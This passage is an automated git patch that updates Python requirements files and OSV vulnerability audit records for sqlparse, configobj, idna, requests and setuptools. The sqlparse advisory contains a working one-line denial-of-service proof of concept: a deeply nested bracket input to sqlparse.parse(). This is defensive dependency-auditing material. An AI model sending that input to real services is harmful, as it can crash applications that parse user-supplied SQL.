From bcff2354769b316caa1a0da14be1ba7fe06de68b Mon Sep 17 00:00:00 2001 
From: "github.actions"
Date: Mon, 14 Oct 2024 08:05:12 +0000
Subject: [PATCH] Latest data: Mon Oct 14 08:05:12 UTC 2024
---
audits/dolphie-requirements.audit.json | 142 +
audits/sickchill-requirements.audit.json | 2381 ++++-------------
requirements/awscli-local-requirements.txt | 10 +-
requirements/cf2tf-requirements.txt | 12 +-
requirements/dolphie-requirements.txt | 10 +-
requirements/hatch-requirements.txt | 6 +-
requirements/iconsur-requirements.txt | 4 +-
requirements/moto-requirements.txt | 2 +-
requirements/podman-compose-requirements.txt | 2 +-
requirements/policy_sentry-requirements.txt | 12 +-
requirements/psutils-requirements.txt | 4 +-
requirements/pyqt-builder-requirements.txt | 2 +-
requirements/pyspelling-requirements.txt | 14 +-
requirements/raven-requirements.txt | 2 +-
requirements/rpmspectool-requirements.txt | 2 +-
requirements/ruff-lsp-requirements.txt | 2 +-
requirements/s3ql-requirements.txt | 14 +-
requirements/sail-requirements.txt | 6 +-
requirements/salt-lint-requirements.txt | 2 +-
requirements/sceptre-requirements.txt | 16 +-
requirements/schemathesis-requirements.txt | 4 +-
requirements/scoutsuite-requirements.txt | 85 +-
requirements/scrapy-requirements.txt | 21 +-
.../search-that-hash-requirements.txt | 8 +-
requirements/sherlock-requirements.txt | 12 +-
requirements/shub-requirements.txt | 10 +-
requirements/shyaml-requirements.txt | 2 +-
requirements/sickchill-requirements.txt | 57 +-
requirements/sigma-cli-requirements.txt | 18 +-
requirements/sip-requirements.txt | 2 +-
.../slither-analyzer-requirements.txt | 21 +-
requirements/snakemake-requirements.txt | 3 +-
requirements/subliminal-requirements.txt | 18 +-
requirements/suricata-requirements.txt | 2 +-
requirements/svtplay-dl-requirements.txt | 8 +-
requirements/sysaidmin-requirements.txt | 14 +-
requirements/tarsnapper-requirements.txt | 2 +-
requirements/tccutil-requirements.txt | 2 +-
requirements/tern-requirements.txt | 2 +-
requirements/terraform-local-requirements.txt | 10 +-
requirements/tmuxp-requirements.txt | 2 +-
requirements/toot-requirements.txt | 2 +-
requirements/touca-requirements.txt | 2 +-
requirements/trafilatura-requirements.txt | 12 +-
requirements/tvnamer-requirements.txt | 6 +-
requirements/twarc-requirements.txt | 4 +-
requirements/uhd-requirements.txt | 2 +-
requirements/urlwatch-requirements.txt | 18 +-
requirements/vdirsyncer-requirements.txt | 13 +-
requirements/vint-requirements.txt | 2 +-
requirements/vit-requirements.txt | 4 +-
requirements/volk-requirements.txt | 4 +-
requirements/vunnel-requirements.txt | 6 +-
requirements/watson-requirements.txt | 8 +-
requirements/woob-requirements.txt | 14 +-
requirements/zabbix-cli-requirements.txt | 10 +-
56 files changed, 991 insertions(+), 2064 deletions(-)
create mode 100644 audits/dolphie-requirements.audit.json
diff --git a/audits/dolphie-requirements.audit.json b/audits/dolphie-requirements.audit.json
new file mode 100644
index 00000000..4a57d3ce
--- /dev/null
+++ b/audits/dolphie-requirements.audit.json
@@ -0,0 +1,142 @@ +[ + { + "package": { + "name": "sqlparse", + "version": "0.4.4", + "ecosystem": "PyPI" + }, + "dependency_groups": [ + "dolphie-requirements" + ], + "vulnerabilities": [ + { + "modified": "2024-05-01T11:15:56Z", + "published": "2024-04-15T20:21:25Z", + "schema_version": "1.6.0", + "id": "GHSA-2m57-hf25-phgg", + "aliases": [ + "CVE-2024-4340" + ], + "related": [ + "CGA-p7rq-qffc-ch9v", + "CGA-v3hx-x533-rpgf" + ], + "summary": "sqlparse parsing heavily nested list leads to Denial of Service", + "details": "### Summary\nPassing a heavily nested list to sqlparse.parse() leads to a Denial of Service due to RecursionError.\n\n### Details + PoC\nRunning the following code will raise Maximum recursion limit exceeded exception:\n```py\nimport sqlparse\nsqlparse.parse('[' * 10000 + ']' * 10000)\n```\nWe expect a traceback of RecursionError:\n```py\nTraceback (most recent call last):\n File \"trigger_sqlparse_nested_list.py\", line 3, in \n sqlparse.parse('[' * 10000 + ']' * 10000)\n File \"/home/uriya/.local/lib/python3.10/site-packages/sqlparse/__init__.py\", line 30, in parse\n return tuple(parsestream(sql, encoding))\n File \"/home/uriya/.local/lib/python3.10/site-packages/sqlparse/engine/filter_stack.py\", line 36, in run\n stmt = grouping.group(stmt)\n File \"/home/uriya/.local/lib/python3.10/site-packages/sqlparse/engine/grouping.py\", line 428, in group\n func(stmt)\n File \"/home/uriya/.local/lib/python3.10/site-packages/sqlparse/engine/grouping.py\", line 53, in group_brackets\n _group_matching(tlist, sql.SquareBrackets)\n File \"/home/uriya/.local/lib/python3.10/site-packages/sqlparse/engine/grouping.py\", line 48, in _group_matching\n tlist.group_tokens(cls, open_idx, close_idx)\n File \"/home/uriya/.local/lib/python3.10/site-packages/sqlparse/sql.py\", line 328, in group_tokens\n grp = grp_cls(subtokens)\n File \"/home/uriya/.local/lib/python3.10/site-packages/sqlparse/sql.py\", line 161, in __init__\n super().__init__(None, str(self))\n File 
\"/home/uriya/.local/lib/python3.10/site-packages/sqlparse/sql.py\", line 165, in __str__\n return ''.join(token.value for token in self.flatten())\n File \"/home/uriya/.local/lib/python3.10/site-packages/sqlparse/sql.py\", line 165, in \n return ''.join(token.value for token in self.flatten())\n File \"/home/uriya/.local/lib/python3.10/site-packages/sqlparse/sql.py\", line 214, in flatten\n yield from token.flatten()\n File \"/home/uriya/.local/lib/python3.10/site-packages/sqlparse/sql.py\", line 214, in flatten\n yield from token.flatten()\n File \"/home/uriya/.local/lib/python3.10/site-packages/sqlparse/sql.py\", line 214, in flatten\n yield from token.flatten()\n [Previous line repeated 983 more times]\nRecursionError: maximum recursion depth exceeded\n```\n\n### Fix suggestion\nThe [flatten()](https://github.com/andialbrecht/sqlparse/blob/master/sqlparse/sql.py#L207) function of TokenList class should limit the recursion to a maximal depth:\n```py\nfrom sqlparse.exceptions import SQLParseError\n\nMAX_DEPTH = 100\n\n def flatten(self, depth=1):\n \"\"\"Generator yielding ungrouped tokens.\n\n This method is recursively called for all child tokens.\n \"\"\"\n if depth >= MAX_DEPTH:\n raise SQLParseError('Maximal depth reached')\n for token in self.tokens:\n if token.is_group:\n yield from token.flatten(depth + 1)\n else:\n yield token\n```\n\n### Impact\nDenial of Service (the impact depends on the use).\nAnyone parsing a user input with sqlparse.parse() is affected.\n", + "affected": [ + { + "package": { + "ecosystem": "PyPI", + "name": "sqlparse", + "purl": "pkg:pypi/sqlparse" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "0.5.0" + } + ] + } + ], + "versions": [ + "0.1.0", + "0.1.1", + "0.1.10", + "0.1.11", + "0.1.12", + "0.1.13", + "0.1.14", + "0.1.15", + "0.1.16", + "0.1.17", + "0.1.18", + "0.1.19", + "0.1.2", + "0.1.3", + "0.1.4", + "0.1.5", + "0.1.6", + "0.1.7", + "0.1.8", + "0.1.9", + "0.2.0", + 
"0.2.1", + "0.2.2", + "0.2.3", + "0.2.4", + "0.3.0", + "0.3.1", + "0.4.0", + "0.4.1", + "0.4.2", + "0.4.3", + "0.4.4" + ], + "database_specific": { + "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/04/GHSA-2m57-hf25-phgg/GHSA-2m57-hf25-phgg.json" + }, + "ecosystem_specific": { + "affected_functions": [ + "sqlparse.parse" + ] + } + } + ], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/andialbrecht/sqlparse/security/advisories/GHSA-2m57-hf25-phgg" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-4340" + }, + { + "type": "WEB", + "url": "https://github.com/andialbrecht/sqlparse/commit/b4a39d9850969b4e1d6940d32094ee0b42a2cf03" + }, + { + "type": "PACKAGE", + "url": "https://github.com/andialbrecht/sqlparse" + }, + { + "type": "WEB", + "url": "https://research.jfrog.com/vulnerabilities/sqlparse-stack-exhaustion-dos-jfsa-2024-001031292" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-674" + ], + "github_reviewed": true, + "github_reviewed_at": "2024-04-15T20:21:25Z", + "nvd_published_at": null, + "severity": "HIGH" + } + } + ], + "groups": [ + { + "ids": [ + "GHSA-2m57-hf25-phgg" + ], + "aliases": [ + "CVE-2024-4340", + "GHSA-2m57-hf25-phgg" + ], + "max_severity": "7.5" + } + ] + } +] \ No newline at end of file diff --git a/audits/sickchill-requirements.audit.json b/audits/sickchill-requirements.audit.json index 570c9185..cba2af1a 100644 --- a/audits/sickchill-requirements.audit.json +++ b/audits/sickchill-requirements.audit.json 
@@ -1,136 +1,8 @@ [ { "package": { - "name": "configobj", - "version": "5.0.8", - "ecosystem": "PyPI" - }, - "dependency_groups": [ - "sickchill-requirements" - ], - "vulnerabilities": [ - { - "modified": "2024-02-18T05:29:13Z", - "published": "2023-04-03T06:30:19Z", - "schema_version": "1.6.0", - "id": "GHSA-c33w-24p9-8m24", - "aliases": [ - "CVE-2023-26112" - ], - "related": [ - "CGA-9r88-r9jr-p44c" - ], - "summary": "configobj ReDoS exploitable by developer using values in a server-side configuration file", - "details": "All versions of the package configobj are vulnerable to Regular Expression Denial of Service (ReDoS) via the validate function, using (.+?)\\((.*)\\). **Note:** This is only exploitable in the case of a developer, putting the offending value in a server side configuration file.", - "affected": [ - { - "package": { - "ecosystem": "PyPI", - "name": "configobj", - "purl": "pkg:pypi/configobj" - }, - "ranges": [ - { - "type": "ECOSYSTEM", - "events": [ - { - "introduced": "0" - }, - { - "last_affected": "5.0.8" - } - ] - } - ], - "versions": [ - "4.4.0", - "4.5.0", - "4.5.1", - "4.5.2", - "4.5.3", - "4.6.0", - "4.7.0", - "4.7.1", - "4.7.2", - "5.0.0", - "5.0.1", - "5.0.2", - "5.0.3", - "5.0.4", - "5.0.5", - "5.0.6", - "5.0.7", - "5.0.8" - ], - "database_specific": { - "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/04/GHSA-c33w-24p9-8m24/GHSA-c33w-24p9-8m24.json" - } - } - ], - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L" - } - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-26112" - }, - { - "type": "WEB", - "url": "https://github.com/DiffSK/configobj/issues/232" - }, - { - "type": "PACKAGE", - "url": "https://github.com/DiffSK/configobj" - }, - { - "type": "WEB", - "url": 
"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6BO4RLMYEJODCNUE3DJIIUUFVTPAG6VN" - }, - { - "type": "WEB", - "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NZHY7B33EFY4LESP2NI4APQUPRROTAZK" - }, - { - "type": "WEB", - "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PYU4IHVLOTYMFPH7KDOJGKZQR4GKWPFK" - }, - { - "type": "WEB", - "url": "https://security.snyk.io/vuln/SNYK-PYTHON-CONFIGOBJ-3252494" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-1333" - ], - "github_reviewed": true, - "github_reviewed_at": "2023-04-04T21:40:45Z", - "nvd_published_at": "2023-04-03T05:15:00Z", - "severity": "LOW" - } - } - ], - "groups": [ - { - "ids": [ - "GHSA-c33w-24p9-8m24" - ], - "aliases": [ - "CVE-2023-26112", - "GHSA-c33w-24p9-8m24" - ], - "max_severity": "3.7" - } - ] - }, - { - "package": { - "name": "idna", - "version": "3.6", + "name": "setuptools", + "version": "69.1.1", "ecosystem": "PyPI" }, "dependency_groups": [ 
@@ -138,42 +10,34 @@ ], "vulnerabilities": [ { - "modified": "2024-07-11T18:46:06Z", - "published": "2024-04-11T21:32:40Z", + "modified": "2024-08-03T08:11:47Z", + "published": "2024-07-15T03:30:57Z", "schema_version": "1.6.0", - "id": "GHSA-jjg7-2v4v-x38h", + "id": "GHSA-cx63-2mw6-8hw5", "aliases": [ - "CVE-2024-3651", - "PYSEC-2024-60" + "BIT-setuptools-2024-6345", + "CVE-2024-6345" ], "related": [ - "CGA-4vmg-xwqh-6xfw", - "CGA-4w25-8r45-gxwf", - "CGA-6445-8x27-cghw", - "CGA-7cvw-824f-57qj", - "CGA-7xfm-q24p-px8c", - "CGA-85gv-65g3-483h", - "CGA-9fj4-pj3g-gm6q", - "CGA-ccwr-5f2w-9q24", - "CGA-fgmr-v3f3-pxpw", - "CGA-hph5-hcwv-q9mm", - "CGA-mcgj-mc29-crgj", - "CGA-mq4p-ggpx-5vxw", - "CGA-q4wf-4rwg-334h", - "CGA-rmvf-7794-q3gg", - "CGA-v584-967x-qgpm", - "CGA-v6qx-945c-jj8w", - "CGA-xpcj-g2x8-wcc9", - "CGA-xw8q-xp4x-825w" + "CGA-374g-f8mr-whvm", + "CGA-4mw5-xqpj-q4mq", + "CGA-c5cf-23gj-ccmf", + "CGA-c79m-39cv-2j6g", + "CGA-f2p4-hwhx-72xc", + "CGA-h655-78w4-797j", + "CGA-qmjx-gwcv-4p8x", + "CGA-rjmx-vqfq-f7rh", + "CGA-x22r-fp37-7vh6", + "CGA-xrq9-4hfh-g5jh" ], - "summary": "Internationalized Domain Names in Applications (IDNA) vulnerable to denial of service from specially crafted inputs to idna.encode", - "details": "### Impact\nA specially crafted argument to the `idna.encode()` function could consume significant resources. This may lead to a denial-of-service.\n\n### Patches\nThe function has been refined to reject such strings without the associated resource consumption in version 3.7.\n\n### Workarounds\nDomain names cannot exceed 253 characters in length, if this length limit is enforced prior to passing the domain to the `idna.encode()` function it should no longer consume significant resources. 
This is triggered by arbitrarily large inputs that would not occur in normal usage, but may be passed to the library assuming there is no preliminary input validation by the higher-level application.\n\n### References\n* https://huntr.com/bounties/93d78d07-d791-4b39-a845-cbfabc44aadb", + "summary": "setuptools vulnerable to Command Injection via package URL", + "details": "A vulnerability in the `package_index` module of pypa/setuptools versions up to 69.1.1 allows for remote code execution via its download functions. These functions, which are used to download packages from URLs provided by users or retrieved from package index servers, are susceptible to code injection. If these functions are exposed to user-controlled inputs, such as package URLs, they can execute arbitrary commands on the system. The issue is fixed in version 70.0.", "affected": [ { "package": { "ecosystem": "PyPI", - "name": "idna", - "purl": "pkg:pypi/idna" + "name": "setuptools", + "purl": "pkg:pypi/setuptools" }, "ranges": [ { 
@@ -183,1715 +47,630 @@ "introduced": "0" }, { - "fixed": "3.7" + "fixed": "70.0.0" } ] } ], "versions": [ - "0.1", - "0.2", - "0.3", - "0.4", - "0.5", - "0.6", - "0.7", + "0.6b1", + "0.6b2", + "0.6b3", + "0.6b4", + "0.6c1", + "0.6c10", + "0.6c11", + "0.6c2", + "0.6c3", + "0.6c4", + "0.6c5", + "0.6c6", + "0.6c7", + "0.6c8", + "0.6c9", + "0.7.2", + "0.7.3", + "0.7.4", + "0.7.5", + "0.7.6", + "0.7.7", + "0.7.8", "0.8", "0.9", + "0.9.1", + "0.9.2", + "0.9.3", + "0.9.4", + "0.9.5", + "0.9.6", + "0.9.7", + "0.9.8", "1.0", "1.1", + "1.1.1", + "1.1.2", + "1.1.3", + "1.1.4", + "1.1.5", + "1.1.6", + "1.1.7", + "1.2", + "1.3", + "1.3.1", + "1.3.2", + "1.4", + "1.4.1", + "1.4.2", + "10.0", + "10.0.1", + "10.1", + "10.2", + "10.2.1", + "11.0", + "11.1", + "11.2", + "11.3", + "11.3.1", + "12.0", + "12.0.1", + "12.0.2", + "12.0.3", + "12.0.4", + "12.0.5", + "12.1", + "12.2", + "12.3", + "12.4", + "13.0", + "13.0.1", + "13.0.2", + "14.0", + "14.1", + "14.1.1", + "14.2", + "14.3", + "14.3.1", + "15.0", + "15.1", + "15.2", + "16.0", + "17.0", + "17.1", + "17.1.1", + "18.0", + "18.0.1", + "18.1", + "18.2", + "18.3", + "18.3.1", + "18.3.2", + "18.4", + "18.5", + "18.6", + "18.6.1", + "18.7", + "18.7.1", + "18.8", + "18.8.1", + "19.0", + "19.1", + "19.1.1", + "19.2", + "19.3", + "19.4", + "19.4.1", + "19.5", + "19.6", + "19.6.1", + "19.6.2", + "19.7", "2.0", + "2.0.1", + "2.0.2", "2.1", - "2.10", + "2.1.1", + "2.1.2", "2.2", - "2.3", - "2.4", - "2.5", - "2.6", - "2.7", - "2.8", - "2.9", - "3.0", - "3.1", - "3.2", - "3.3", - "3.4", - "3.5", - "3.6" - ], - "database_specific": { - "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/04/GHSA-jjg7-2v4v-x38h/GHSA-jjg7-2v4v-x38h.json" - } - } - ], - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" - }, - { - "type": "CVSS_V4", - "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N" - } - ], - "references": [ - { - "type": "WEB", 
- "url": "https://github.com/kjd/idna/security/advisories/GHSA-jjg7-2v4v-x38h" - }, - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-3651" - }, - { - "type": "WEB", - "url": "https://github.com/kjd/idna/commit/1d365e17e10d72d0b7876316fc7b9ca0eebdd38d" - }, - { - "type": "PACKAGE", - "url": "https://github.com/kjd/idna" - }, - { - "type": "WEB", - "url": "https://github.com/pypa/advisory-database/tree/main/vulns/idna/PYSEC-2024-60.yaml" - }, - { - "type": "WEB", - "url": "https://huntr.com/bounties/93d78d07-d791-4b39-a845-cbfabc44aadb" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-400" - ], - "github_reviewed": true, - "github_reviewed_at": "2024-04-11T21:32:40Z", - "nvd_published_at": "2024-07-07T18:15:09Z", - "severity": "MODERATE" - } - }, - { - "modified": "2024-07-11T17:42:33Z", - "published": "2024-07-07T18:15:00Z", - "schema_version": "1.6.0", - "id": "PYSEC-2024-60", - "aliases": [ - "CVE-2024-3651", - "GHSA-jjg7-2v4v-x38h" - ], - "details": "A vulnerability was identified in the kjd/idna library, specifically within the `idna.encode()` function, affecting version 3.6. The issue arises from the function's handling of crafted input strings, which can lead to quadratic complexity and consequently, a denial of service condition. 
This vulnerability is triggered by a crafted input that causes the `idna.encode()` function to process the input with considerable computational load, significantly increasing the processing time in a quadratic manner relative to the input size.", - "affected": [ - { - "package": { - "ecosystem": "PyPI", - "name": "idna", - "purl": "pkg:pypi/idna" - }, - "ranges": [ - { - "type": "GIT", - "events": [ - { - "introduced": "0" - }, - { - "fixed": "1d365e17e10d72d0b7876316fc7b9ca0eebdd38d" - } - ], - "repo": "https://github.com/kjd/idna" - }, - { - "type": "ECOSYSTEM", - "events": [ - { - "introduced": "0.1" - }, - { - "fixed": "3.7" - } - ] - } - ], - "versions": [ - "0.1", - "0.2", - "0.3", - "0.4", - "0.5", - "0.6", - "0.7", - "0.8", - "0.9", - "1.0", - "1.1", - "2.0", - "2.1", - "2.10", - "2.2", - "2.3", - "2.4", - "2.5", - "2.6", - "2.7", - "2.8", - "2.9", - "3.0", - "3.1", - "3.2", - "3.3", - "3.4", - "3.5", - "3.6" - ], - "database_specific": { - "source": "https://github.com/pypa/advisory-database/blob/main/vulns/idna/PYSEC-2024-60.yaml" - } - } - ], - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" - } - ], - "references": [ - { - "type": "FIX", - "url": "https://huntr.com/bounties/93d78d07-d791-4b39-a845-cbfabc44aadb" - }, - { - "type": "FIX", - "url": "https://github.com/kjd/idna/commit/1d365e17e10d72d0b7876316fc7b9ca0eebdd38d" - } - ] - } - ], - "groups": [ - { - "ids": [ - "PYSEC-2024-60", - "GHSA-jjg7-2v4v-x38h" - ], - "aliases": [ - "CVE-2024-3651", - "GHSA-jjg7-2v4v-x38h", - "PYSEC-2024-60" - ], - "max_severity": "7.5" - } - ] - }, - { - "package": { - "name": "requests", - "version": "2.31.0", - "ecosystem": "PyPI" - }, - "dependency_groups": [ - "sickchill-requirements" - ], - "vulnerabilities": [ - { - "modified": "2024-07-15T22:12:27Z", - "published": "2024-05-20T20:15:00Z", - "schema_version": "1.6.0", - "id": "GHSA-9wx4-h78v-vm56", - "aliases": [ - "CVE-2024-35195" - ], - "related": [ - 
"CGA-2qh2-jp77-wp2x", - "CGA-32qh-xq5g-9xq4", - "CGA-432x-3phh-56c7", - "CGA-4354-v6cq-3f5f", - "CGA-4xx2-v3vc-q5x8", - "CGA-6rf6-59qq-87jc", - "CGA-6v4c-f9mw-8ghc", - "CGA-74xp-46xv-7q3v", - "CGA-77h5-pgh2-r2fg", - "CGA-8mx8-8v5r-99xg", - "CGA-fff7-969w-wcq5", - "CGA-hf9v-fwg4-2jvw", - "CGA-hhrg-5mf5-r2p5", - "CGA-jcgc-jpw2-xpqq", - "CGA-p79x-5pxg-f77m", - "CGA-phrh-j36c-pqjq", - "CGA-rrq3-6489-25cv", - "CGA-v263-vf6g-w8hh", - "CGA-v542-whj6-7mj4", - "CGA-whqq-jwxh-vf92", - "CGA-x395-8f45-7j43" - ], - "summary": "Requests `Session` object does not verify requests after making first request with verify=False", - "details": "When making requests through a Requests `Session`, if the first request is made with `verify=False` to disable cert verification, all subsequent requests to the same origin will continue to ignore cert verification regardless of changes to the value of `verify`. This behavior will continue for the lifecycle of the connection in the connection pool.\n\n### Remediation\nAny of these options can be used to remediate the current issue, we highly recommend upgrading as the preferred mitigation.\n\n* Upgrade to `requests>=2.32.0`.\n* For `requests<2.32.0`, avoid setting `verify=False` for the first request to a host while using a Requests Session.\n* For `requests<2.32.0`, call `close()` on `Session` objects to clear existing connections if `verify=False` is used.\n\n### Related Links\n* https://github.com/psf/requests/pull/6655", - "affected": [ - { - "package": { - "ecosystem": "PyPI", - "name": "requests", - "purl": "pkg:pypi/requests" - }, - "ranges": [ - { - "type": "ECOSYSTEM", - "events": [ - { - "introduced": "0" - }, - { - "fixed": "2.32.0" - } - ] - } - ], - "versions": [ - "0.0.1", - "0.10.0", - "0.10.1", - "0.10.2", - "0.10.3", - "0.10.4", - "0.10.6", - "0.10.7", - "0.10.8", - "0.11.1", - "0.11.2", - "0.12.0", - "0.12.01", - "0.12.1", - "0.13.0", - "0.13.1", - "0.13.2", - "0.13.3", - "0.13.4", - "0.13.5", - "0.13.6", - "0.13.7", - 
"0.13.8", - "0.13.9", - "0.14.0", - "0.14.1", - "0.14.2", - "0.2.0", - "0.2.1", - "0.2.2", - "0.2.3", - "0.2.4", - "0.3.0", - "0.3.1", - "0.3.2", - "0.3.3", - "0.3.4", - "0.4.0", - "0.4.1", - "0.5.0", - "0.5.1", - "0.6.0", - "0.6.1", - "0.6.2", - "0.6.3", - "0.6.4", - "0.6.5", - "0.6.6", - "0.7.0", - "0.7.1", - "0.7.2", - "0.7.3", - "0.7.4", - "0.7.5", - "0.7.6", - "0.8.0", - "0.8.1", - "0.8.2", - "0.8.3", - "0.8.4", - "0.8.5", - "0.8.6", - "0.8.7", - "0.8.8", - "0.8.9", - "0.9.0", - "0.9.1", - "0.9.2", - "0.9.3", - "1.0.0", - "1.0.1", - "1.0.2", - "1.0.3", - "1.0.4", - "1.1.0", - "1.2.0", - "1.2.1", - "1.2.2", - "1.2.3", - "2.0.0", - "2.0.1", - "2.1.0", - "2.10.0", - "2.11.0", - "2.11.1", - "2.12.0", - "2.12.1", - "2.12.2", - "2.12.3", - "2.12.4", - "2.12.5", - "2.13.0", - "2.14.0", - "2.14.1", - "2.14.2", - "2.15.0", - "2.15.1", - "2.16.0", - "2.16.1", - "2.16.2", - "2.16.3", - "2.16.4", - "2.16.5", - "2.17.0", - "2.17.1", - "2.17.2", - "2.17.3", - "2.18.0", - "2.18.1", - "2.18.2", - "2.18.3", - "2.18.4", - "2.19.0", - "2.19.1", - "2.2.0", - "2.2.1", - "2.20.0", - "2.20.1", - "2.21.0", - "2.22.0", - "2.23.0", - "2.24.0", - "2.25.0", - "2.25.1", - "2.26.0", - "2.27.0", - "2.27.1", - "2.28.0", - "2.28.1", - "2.28.2", - "2.29.0", - "2.3.0", - "2.30.0", - "2.31.0", - "2.4.0", - "2.4.1", - "2.4.2", - "2.4.3", - "2.5.0", - "2.5.1", - "2.5.2", - "2.5.3", - "2.6.0", - "2.6.1", - "2.6.2", - "2.7.0", - "2.8.0", - "2.8.1", - "2.9.0", - "2.9.1", - "2.9.2" - ], - "database_specific": { - "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/05/GHSA-9wx4-h78v-vm56/GHSA-9wx4-h78v-vm56.json" - } - } - ], - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.1/AV:L/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:N" - } - ], - "references": [ - { - "type": "WEB", - "url": "https://github.com/psf/requests/security/advisories/GHSA-9wx4-h78v-vm56" - }, - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-35195" - }, - { - "type": 
"WEB", - "url": "https://github.com/psf/requests/pull/6655" - }, - { - "type": "WEB", - "url": "https://github.com/psf/requests/commit/a58d7f2ffb4d00b46dca2d70a3932a0b37e22fac" - }, - { - "type": "PACKAGE", - "url": "https://github.com/psf/requests" - }, - { - "type": "WEB", - "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/IYLSNK5TL46Q6XPRVMHVWS63MVJQOK4Q" - }, - { - "type": "WEB", - "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/N7WP6EYDSUOCOJYHDK5NX43PYZ4SNHGZ" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-670" - ], - "github_reviewed": true, - "github_reviewed_at": "2024-05-20T20:15:00Z", - "nvd_published_at": "2024-05-20T21:15:09Z", - "severity": "MODERATE" - } - } - ], - "groups": [ - { - "ids": [ - "GHSA-9wx4-h78v-vm56" - ], - "aliases": [ - "CVE-2024-35195", - "GHSA-9wx4-h78v-vm56" - ], - "max_severity": "5.6" - } - ] - }, - { - "package": { - "name": "setuptools", - "version": "69.1.1", - "ecosystem": "PyPI" - }, - "dependency_groups": [ - "sickchill-requirements" - ], - "vulnerabilities": [ - { - "modified": "2024-08-03T08:11:47Z", - "published": "2024-07-15T03:30:57Z", - "schema_version": "1.6.0", - "id": "GHSA-cx63-2mw6-8hw5", - "aliases": [ - "BIT-setuptools-2024-6345", - "CVE-2024-6345" - ], - "related": [ - "CGA-374g-f8mr-whvm", - "CGA-4mw5-xqpj-q4mq", - "CGA-c5cf-23gj-ccmf", - "CGA-c79m-39cv-2j6g", - "CGA-f2p4-hwhx-72xc", - "CGA-h655-78w4-797j", - "CGA-qmjx-gwcv-4p8x", - "CGA-rjmx-vqfq-f7rh", - "CGA-x22r-fp37-7vh6", - "CGA-xrq9-4hfh-g5jh" - ], - "summary": "setuptools vulnerable to Command Injection via package URL", - "details": "A vulnerability in the `package_index` module of pypa/setuptools versions up to 69.1.1 allows for remote code execution via its download functions. These functions, which are used to download packages from URLs provided by users or retrieved from package index servers, are susceptible to code injection. 
If these functions are exposed to user-controlled inputs, such as package URLs, they can execute arbitrary commands on the system. The issue is fixed in version 70.0.", - "affected": [ - { - "package": { - "ecosystem": "PyPI", - "name": "setuptools", - "purl": "pkg:pypi/setuptools" - }, - "ranges": [ - { - "type": "ECOSYSTEM", - "events": [ - { - "introduced": "0" - }, - { - "fixed": "70.0.0" - } - ] - } - ], - "versions": [ - "0.6b1", - "0.6b2", - "0.6b3", - "0.6b4", - "0.6c1", - "0.6c10", - "0.6c11", - "0.6c2", - "0.6c3", - "0.6c4", - "0.6c5", - "0.6c6", - "0.6c7", - "0.6c8", - "0.6c9", - "0.7.2", - "0.7.3", - "0.7.4", - "0.7.5", - "0.7.6", - "0.7.7", - "0.7.8", - "0.8", - "0.9", - "0.9.1", - "0.9.2", - "0.9.3", - "0.9.4", - "0.9.5", - "0.9.6", - "0.9.7", - "0.9.8", - "1.0", - "1.1", - "1.1.1", - "1.1.2", - "1.1.3", - "1.1.4", - "1.1.5", - "1.1.6", - "1.1.7", - "1.2", - "1.3", - "1.3.1", - "1.3.2", - "1.4", - "1.4.1", - "1.4.2", - "10.0", - "10.0.1", - "10.1", - "10.2", - "10.2.1", - "11.0", - "11.1", - "11.2", - "11.3", - "11.3.1", - "12.0", - "12.0.1", - "12.0.2", - "12.0.3", - "12.0.4", - "12.0.5", - "12.1", - "12.2", - "12.3", - "12.4", - "13.0", - "13.0.1", - "13.0.2", - "14.0", - "14.1", - "14.1.1", - "14.2", - "14.3", - "14.3.1", - "15.0", - "15.1", - "15.2", - "16.0", - "17.0", - "17.1", - "17.1.1", - "18.0", - "18.0.1", - "18.1", - "18.2", - "18.3", - "18.3.1", - "18.3.2", - "18.4", - "18.5", - "18.6", - "18.6.1", - "18.7", - "18.7.1", - "18.8", - "18.8.1", - "19.0", - "19.1", - "19.1.1", - "19.2", - "19.3", - "19.4", - "19.4.1", - "19.5", - "19.6", - "19.6.1", - "19.6.2", - "19.7", - "2.0", - "2.0.1", - "2.0.2", - "2.1", - "2.1.1", - "2.1.2", - "2.2", - "20.0", - "20.1", - "20.1.1", - "20.10.1", - "20.2.2", - "20.3", - "20.3.1", - "20.4", - "20.6.6", - "20.6.7", - "20.6.8", - "20.7.0", - "20.8.0", - "20.8.1", - "20.9.0", - "21.0.0", - "21.1.0", - "21.2.0", - "21.2.1", - "21.2.2", - "22.0.0", - "22.0.1", - "22.0.2", - "22.0.4", - "22.0.5", - "23.0.0", - 
